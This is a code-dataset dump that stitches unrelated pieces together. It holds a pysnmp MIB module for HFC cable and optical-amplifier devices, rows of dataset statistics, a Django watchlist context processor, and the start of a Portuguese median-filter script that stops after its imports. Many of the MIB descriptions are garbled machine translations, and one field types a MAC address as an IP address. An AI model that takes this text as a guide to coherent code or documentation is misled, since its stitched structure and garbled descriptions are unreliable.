commonTrapAck = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(17, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonTrapAck.setStatus('optional')
if mibBuilder.loadTexts: commonTrapAck.setDescription('The variables used to notify Snmp agents, it issued the warning Trap has received information management console, do not have to re-hair. The content of the variables in alarmLogInformation MIB and the same warning. Agents received after the adoption of alarmLogInformation management can clearly know the host response is a warning which Trap information, thereby stop the alarm information re the Trap.')
commonAgentTrapTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7), )
if mibBuilder.loadTexts: commonAgentTrapTable.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapTable.setDescription('Acting Information Table TRAP.')
commonAgentTrapEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1), ).setIndexNames((0, "NSCRTV-ROOT", "commonAgentTrapIndex"))
if mibBuilder.loadTexts: commonAgentTrapEntry.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapEntry.setDescription('Acting Head TRAP Information Table.')
commonAgentTrapIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonAgentTrapIndex.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapIndex.setDescription('TRAP Table Index.')
commonAgentTrapIP = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapIP.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapIP.setDescription("When the purpose of the TRAP host's IP address.")
commonAgentTrapCommunity = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapCommunity.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapCommunity.setDescription('Send the Community string TRAP.')
commonAgentTrapStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("commonAgentTrapEnable", 1), ("commonAgentTrapDisable", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapStatus.setDescription('It said the opening of the TRAP.')
commonDeviceNum = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 1), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonDeviceNum.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceNum.setDescription('The agent said that the current management is the number of devices.')
commonDeviceInfoTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2), )
if mibBuilder.loadTexts: commonDeviceInfoTable.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceInfoTable.setDescription('Acting is currently public information management equipment List.')
commonDeviceInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1), ).setIndexNames((0, "NSCRTV-ROOT", "commonDeviceSlot"))
if mibBuilder.loadTexts: commonDeviceInfoEntry.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceInfoEntry.setDescription('Acting is currently public information management equipment list Table Head.')
commonDeviceSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceSlot.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceSlot.setDescription('Acting is currently under the management of the equipment list of public information table Index.')
commonDevicesID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 40))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDevicesID.setStatus('mandatory')
if mibBuilder.loadTexts: commonDevicesID.setDescription('Designated equipment manufacturers logo.')
commonDeviceVendor = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceVendor.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceVendor.setDescription('Equipment manufacturers.')
commonDeviceModelNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceModelNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceModelNumber.setDescription('Equipment Model.')
commonDeviceSerialNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceSerialNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceSerialNumber.setDescription('The string of equipment.')
commonDeviceVendorInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceVendorInfo.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceVendorInfo.setDescription('Equipment suppliers of other special designated information.')
commonDeviceStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceStatus.setDescription('The state equipment Bit 0: RSVD0 Bit 1: RSVD1 Bit 2: RSVD2 Bit 3: MAJOR ALARMS Bit 4: MINOR ALARMS Bit 5: RSVD5 Bit 6: RSVD6 Bit 7: RSVD7')
commonDeviceReset = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonDeviceReset.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceReset.setDescription("Write'1 'will be reset equipment, other values will be written into the non-functional. Reading this object return value'1 ', had no effect on equipment.")
commonDeviceAlarmDetectionControl = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("detectionDisabled", 1), ("detectionEnabled", 2), ("detectionEnabledAndRegenerate", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonDeviceAlarmDetectionControl.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceAlarmDetectionControl.setDescription('This object used to control equipment Alarm Detection.')
commonDeviceMACAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 10), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceMACAddress.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceMACAddress.setDescription('Equipment MAC address.')
commonDeviceTamperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("intact", 1), ("compromised", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceTamperStatus.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceTamperStatus.setDescription('Report of the safety switch equipment (such as whether to open up the lid) state that this object is called discrete attributes of a corresponding entry in the table. Intact that normal, expressed alarm compromised.')
commonDeviceInternalTemperature = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-128, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceInternalTemperature.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceInternalTemperature.setDescription('Equipment Room (machine) temperature, units degrees Celsius. This request object attribute in a corresponding entry in the table.')
commonDeviceResetCause = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("powerup", 2), ("command", 3), ("watchdog", 4), ("craft", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceResetCause.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceResetCause.setDescription('Equipment that the reasons for the recent reduction.')
commonDeviceCraftStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disconnected", 1), ("connected", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceCraftStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceCraftStatus.setDescription('This object interface that local equipment (such as RS232 or RS485 interface) state.')
commonDevicesOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 15), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDevicesOID.setStatus('mandatory')
if mibBuilder.loadTexts: commonDevicesOID.setDescription('Goals identifier string, point to a concrete realization of the equipment.')
commonDeviceAcct = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceAcct.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceAcct.setDescription('Equipment that the accumulated work time, units of s.')
commonDeviceName = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 17), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceName.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceName.setDescription('Equipment Name.')
commonDeviceMFD = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 18), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(10, 10)).setFixedLength(10)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceMFD.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceMFD.setDescription('Date of production equipment.')
commonDeviceFW = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 19), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceFW.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceFW.setDescription('Firmware information equipment.')
hfcColdStart = NotificationType((1, 3, 6, 1, 4, 1, 17409, 1) + (0,0)).setObjects(("NSCRTV-ROOT", "commonPhysAddress"), ("NSCRTV-ROOT", "commonNELogicalID"))
if mibBuilder.loadTexts: hfcColdStart.setDescription('HfcColdStart traps that are sent to re-initialization protocol entities, and entities agent configuration or agreement may have changed. This trap only after the success of transponder sent registration.')
hfcWarmStart = NotificationType((1, 3, 6, 1, 4, 1, 17409, 1) + (0,2)).setObjects(("NSCRTV-ROOT", "commonPhysAddress"), ("NSCRTV-ROOT", "commonNELogicalID"))
if mibBuilder.loadTexts: hfcWarmStart.setDescription('HfcWarmStart traps that are sent to re-initialization protocol entities, and entities agent configuration or agreement has not changed. This trap only after the completion of transponder sent registration.')
oaVendorOID = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaVendorOID.setStatus('optional')
if mibBuilder.loadTexts: oaVendorOID.setDescription('This object provides manufacturers of optical amplifier MIB expansion. Without the expansion, this should be targeting at the optical amplifier nodes oaIdent.')
oaOutputOpticalPower = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaOutputOpticalPower.setStatus('mandatory')
if mibBuilder.loadTexts: oaOutputOpticalPower.setDescription('The output optical power units to 0.1 dBm, the object attributes required to register an entry MIB.')
oaInputOpticalPower = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-128, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaInputOpticalPower.setStatus('mandatory')
if mibBuilder.loadTexts: oaInputOpticalPower.setDescription('Input optical power units to 0.1 dBm, the object attributes required to register an entry MIB.')
oaPumpTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4), )
if mibBuilder.loadTexts: oaPumpTable.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpTable.setDescription('EDFA laser pump Information Table.')
oaPumpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1), ).setIndexNames((0, "NSCRTV-ROOT", "oaPumpIndex"))
if mibBuilder.loadTexts: oaPumpEntry.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpEntry.setDescription('Each laser-pumped optical amplifier Information Table Head.')
oaPumpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpIndex.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpIndex.setDescription('Laser-pumped optical amplifier index value.')
oaPumpBIAS = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpBIAS.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpBIAS.setDescription('The pump laser bias current, flat mA, this attribute MIB objects require an entry in the register.')
oaPumpTEC = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-32768, 32767))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpTEC.setStatus('optional')
if mibBuilder.loadTexts: oaPumpTEC.setDescription('Current laser pump refrigeration unit is 0.01 A, this attribute MIB objects require an entry in the register.')
oaPumpTemp = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 32768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpTemp.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpTemp.setDescription('Laser pump temperature, units of 0.10 C, this attribute MIB objects require an entry in the register.')
oaNumberDCPowerSupply = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaNumberDCPowerSupply.setStatus('mandatory')
if mibBuilder.loadTexts: oaNumberDCPowerSupply.setDescription('The number of internal DC power supply, 0 expressed transponder does not support this function.')
oaDCPowerSupplyMode = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("loadsharing", 1), ("switchedRedundant", 2), ("aloneSupply", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerSupplyMode.setStatus('optional')
if mibBuilder.loadTexts: oaDCPowerSupplyMode.setDescription('Power supply mode: load sharing, standby switching or an independent power supply.')
oaDCPowerTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7), )
if mibBuilder.loadTexts: oaDCPowerTable.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerTable.setDescription('DC Power Information Table.')
oaDCPowerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1), ).setIndexNames((0, "NSCRTV-ROOT", "oaDCPowerIndex"))
if mibBuilder.loadTexts: oaDCPowerEntry.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerEntry.setDescription('DC Power Information Table Head.')
oaDCPowerIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerIndex.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerIndex.setDescription('DC Power Index.')
oaDCPowerVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-32768, 32767))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerVoltage.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerVoltage.setDescription('Supply voltage, the unit is 0.1 V. This attribute MIB objects require an entry in the register.')
oaDCPowerCurrent = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerCurrent.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerCurrent.setDescription('Electricity power supply unit is 0.01 A. This attribute MIB objects require an entry in the register.')
oaDCPowerName = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerName.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerName.setDescription('Indicate the name of the power supply, for example: 24 V DC power supply. This field value by the user, should at least be marked with a number of power supply voltage and distinguish between each other. When the object of this table have a warning, that this object should be put into the name of alarmText hfcAlarmEvent traps in the target.')
oaOutputOpticalPowerSet = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: oaOutputOpticalPowerSet.setStatus('mandatory')
if mibBuilder.loadTexts: oaOutputOpticalPowerSet.setDescription('The output optical power control ,units to 0.1 dBm')
oaGainSet = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: oaGainSet.setStatus('mandatory')
if mibBuilder.loadTexts: oaGainSet.setDescription('units to 0.1 dB')
powerSupplyStatusA = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("undefined", 0), ("nominal", 1), ("failure", 2), ("notInstalled", 3)))).setUnits('no units').setMaxAccess("readonly")
if mibBuilder.loadTexts: powerSupplyStatusA.setStatus('current')
if mibBuilder.loadTexts: powerSupplyStatusA.setDescription('Returns the operating status of power supply A.')
powerSupplyStatusB = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("undefined", 0), ("nominal", 1), ("failure", 2), ("notInstalled", 3)))).setUnits('no units').setMaxAccess("readonly")
if mibBuilder.loadTexts: powerSupplyStatusB.setStatus('current')
if mibBuilder.loadTexts: powerSupplyStatusB.setDescription('Returns the operating status of power supply B.')
mibBuilder.exportSymbols("NSCRTV-ROOT", commonRfGroup=commonRfGroup, oaPumpTable=oaPumpTable, oaDCPowerSupplyMode=oaDCPowerSupplyMode, hfcWarmStart=hfcWarmStart, commonAgentMaxTraps=commonAgentMaxTraps, commonReturnPathFrequency=commonReturnPathFrequency, commonAgentTrapIndex=commonAgentTrapIndex, commonDeviceInfoTable=commonDeviceInfoTable, commonAgentTrapStatus=commonAgentTrapStatus, oaDCPowerTable=oaDCPowerTable, discreteAlarmEnable=discreteAlarmEnable, commonBackwardPathCollisionTimes=commonBackwardPathCollisionTimes, commonNELogicalID=commonNELogicalID, commonForwardPathFramingErrors=commonForwardPathFramingErrors, alarmLogNumberOfEntries=alarmLogNumberOfEntries, oaInputOpticalPower=oaInputOpticalPower, analogPropertyEntry=analogPropertyEntry, oaPumpIndex=oaPumpIndex, commonDeviceMACAddress=commonDeviceMACAddress, commonForwardPathLOSEvents=commonForwardPathLOSEvents, commonDeviceInternalTemperature=commonDeviceInternalTemperature, oaPumpTemp=oaPumpTemp, commonACKTimeoutWindow=commonACKTimeoutWindow, commonAgentTrapEntry=commonAgentTrapEntry, currentAlarmOID=currentAlarmOID, commonDeviceCraftStatus=commonDeviceCraftStatus, commonDeviceName=commonDeviceName, commonIdent=commonIdent, commonResetCause=commonResetCause, analogPropertyTable=analogPropertyTable, commonMulticastAddressEntry=commonMulticastAddressEntry, commonDevicesOID=commonDevicesOID, oaDCPowerEntry=oaDCPowerEntry, commonDeviceStatus=commonDeviceStatus, currentAlarmValue=currentAlarmValue, commonAgentTrapMinInterval=commonAgentTrapMinInterval, nscrtvHFCemsTree=nscrtvHFCemsTree, alarmLogTable=alarmLogTable, hfcColdStart=hfcColdStart, commonNEVendorInfo=commonNEVendorInfo, oaOutputOpticalPowerSet=oaOutputOpticalPowerSet, oaOutputOpticalPower=oaOutputOpticalPower, commonDeviceAcct=commonDeviceAcct, commonMulticastAddressNumber=commonMulticastAddressNumber, commonAgentGroup=commonAgentGroup, currentAlarmTable=currentAlarmTable, oaDCPowerCurrent=oaDCPowerCurrent, commonDeviceInfoEntry=commonDeviceInfoEntry, discreteAlarmValue=discreteAlarmValue, commonVarBindings=commonVarBindings, commonMacStats=commonMacStats, discreteParameterOID=discreteParameterOID, commonForwardPathFrequency=commonForwardPathFrequency, commonDeviceSerialNumber=commonDeviceSerialNumber, commonAgentReset=commonAgentReset, commonAgentTrapMaxInterval=commonAgentTrapMaxInterval, commonDeviceGroup=commonDeviceGroup, propertyIdent=propertyIdent, nscrtvRoot=nscrtvRoot, commonMACGroup=commonMACGroup, commonDeviceMFD=commonDeviceMFD, commonNetworkAddress=commonNetworkAddress, oaPumpTEC=oaPumpTEC, commonMaxPayloadSize=commonMaxPayloadSize, powerSupplyStatusB=powerSupplyStatusB, hfcAlarmEvent=hfcAlarmEvent, powerSupplyStatusA=powerSupplyStatusA, discreteAlarmState=discreteAlarmState, commonBackoffMaximumExponent=commonBackoffMaximumExponent, analogAlarmState=analogAlarmState, analogAlarmHIHI=analogAlarmHIHI, currentAlarmEntry=currentAlarmEntry, alarmLogEntry=alarmLogEntry, commonBackoffParams=commonBackoffParams, oaPumpEntry=oaPumpEntry, commonDeviceModelNumber=commonDeviceModelNumber, commonForwardPathReceiveLevel=commonForwardPathReceiveLevel, commonDeviceSlot=commonDeviceSlot, analogAlarmLO=analogAlarmLO, oaGainSet=oaGainSet, commonTime=commonTime, alarmsIdent=alarmsIdent, commonNEModelNumber=commonNEModelNumber, commonMaximumMACLayerRetries=commonMaximumMACLayerRetries, commonAgentTrapIP=commonAgentTrapIP, commonBackoffPeriod=commonBackoffPeriod, commonPhysAddress=commonPhysAddress, commonMaxMulticastAddresses=commonMaxMulticastAddresses, commonDeviceAlarmDetectionControl=commonDeviceAlarmDetectionControl, commonDeviceVendorInfo=commonDeviceVendorInfo, commonAdminUseRf=commonAdminUseRf, commonAdminGroup=commonAdminGroup, alarmEnable=alarmEnable, commonCheckCode=commonCheckCode, commonNEVendor=commonNEVendor, commonMaxReturnPower=commonMaxReturnPower, commonAgentTrapCommunity=commonAgentTrapCommunity, oaDCPowerIndex=oaDCPowerIndex, commonDeviceId=commonDeviceId, oaVendorOID=oaVendorOID, alarmLogLastIndex=alarmLogLastIndex, commonTrapCommunityString=commonTrapCommunityString, commonReset=commonReset, commonMacAddress=commonMacAddress, discretePropertyTable=discretePropertyTable, analogAlarmHI=analogAlarmHI, commonForwardPathCRCErrors=commonForwardPathCRCErrors, commonNEStatus=commonNEStatus, oaIdent=oaIdent, commonDeviceOID=commonDeviceOID, commonInvalidMacCmds=commonInvalidMacCmds, oaPumpBIAS=oaPumpBIAS, commonTrapAck=commonTrapAck, commonDeviceVendor=commonDeviceVendor, commonDeviceResetCause=commonDeviceResetCause, commonDeviceFW=commonDeviceFW, alarmText=alarmText, commonAdminUseEthernet=commonAdminUseEthernet, oaDCPowerVoltage=oaDCPowerVoltage, oaDCPowerName=oaDCPowerName, commonDeviceTamperStatus=commonDeviceTamperStatus, commondownload=commondownload, commonDeviceNum=commonDeviceNum, oaNumberDCPowerSupply=oaNumberDCPowerSupply, alarmLogInformation=alarmLogInformation, commonAlarmDetectionControl=commonAlarmDetectionControl, analogParameterOID=analogParameterOID, commonAgentBootWay=commonAgentBootWay, commonInternalTemperature=commonInternalTemperature, commonTamperStatus=commonTamperStatus, commonMulticastAddressIndex=commonMulticastAddressIndex, alarmLogIndex=alarmLogIndex, commonNESerialNumber=commonNESerialNumber, commonProvisionedReturnPowerLevel=commonProvisionedReturnPowerLevel, analogAlarmDeadband=analogAlarmDeadband, currentAlarmState=currentAlarmState, discretePropertyEntry=discretePropertyEntry, commonDeviceReset=commonDeviceReset, commonBackoffMinimumExponent=commonBackoffMinimumExponent, commonMulticastAddressTable=commonMulticastAddressTable, analogAlarmLOLO=analogAlarmLOLO, commonAgentTrapTable=commonAgentTrapTable, commonDevicesID=commonDevicesID, commonCraftStatus=commonCraftStatus)
| 143.893204 | 5,737 | 0.789404 | 7,028 | 59,284 | 6.659789 | 0.110273 | 0.010939 | 0.113514 | 0.012306 | 0.500395 | 0.36432 | 0.317787 | 0.29969 | 0.274607 | 0.261254 | 0.000101 | 0.056326 | 0.091104 | 59,284 | 411 | 5,738 | 144.243309 | 0.812204 | 0.00533 | 0 | 0 | 0 | 0.118812 | 0.29166 | 0.004054 | 0 | 0 | 0.000068 | 0 | 0 | 1 | 0 | false | 0 | 0.014851 | 0 | 0.014851 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f89f9d595d76922df28dcd1b0504933e5a49f052 | 527 | py | Python | auctions/context_processors.py | juannajul/CS50Ecommerce | d3e8b07b4f3266f99075d408c42019426d6b7f07 | [
"MIT"
] | null | null | null | auctions/context_processors.py | juannajul/CS50Ecommerce | d3e8b07b4f3266f99075d408c42019426d6b7f07 | [
"MIT"
] | null | null | null | auctions/context_processors.py | juannajul/CS50Ecommerce | d3e8b07b4f3266f99075d408c42019426d6b7f07 | [
"MIT"
] | null | null | null | from auctions.models import *
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
def get_watchlist(request):
watchlist_number=""
if request.user.is_authenticated:
user = request.user
watchlist_number = WatchList.objects.filter(user_watcher=user).count()
return {
'watchlist_number': watchlist_number
}
else:
return {
'watchlist_number': watchlist_number
}
| 26.35 | 78 | 0.658444 | 54 | 527 | 6.240741 | 0.5 | 0.267062 | 0.21365 | 0.124629 | 0.21365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.265655 | 527 | 19 | 79 | 27.736842 | 0.870801 | 0 | 0 | 0.266667 | 0 | 0 | 0.060837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f8b0dbb0df374378b1d09d8e75618bfe40e75334 | 873 | py | Python | algorithms/3 - Spatial filtering for smoothing/3 - Median Filter/med.py | MatheusRV/Image-Processing-Course | c54f58a171c705839ab39aa0c30b555dc065747b | [
"MIT"
] | null | null | null | algorithms/3 - Spatial filtering for smoothing/3 - Median Filter/med.py | MatheusRV/Image-Processing-Course | c54f58a171c705839ab39aa0c30b555dc065747b | [
"MIT"
] | null | null | null | algorithms/3 - Spatial filtering for smoothing/3 - Median Filter/med.py | MatheusRV/Image-Processing-Course | c54f58a171c705839ab39aa0c30b555dc065747b | [
"MIT"
] | null | null | null | # Universidade Federal de Viçosa - Campus Rio Paranaíba
# Sistemas de Informação - Processamento Digital de Imagens
#
# Professor: Joao Mari
# Autores:
# - MatheusRV (3929)
# - iguit0 (3902)
# - ThiagoMunich (3628)
#
# Filtragem espacial para suavização - Filtro de máximo e mínimo
# Como Executar:
# $ python med.py img_1.tif saida <mask_size>
# <mask_size> é um número inteiro. Exemplo: Se mask_size=3 então a máscara possui tamanho 3x3
import sys
import os
import numpy as np
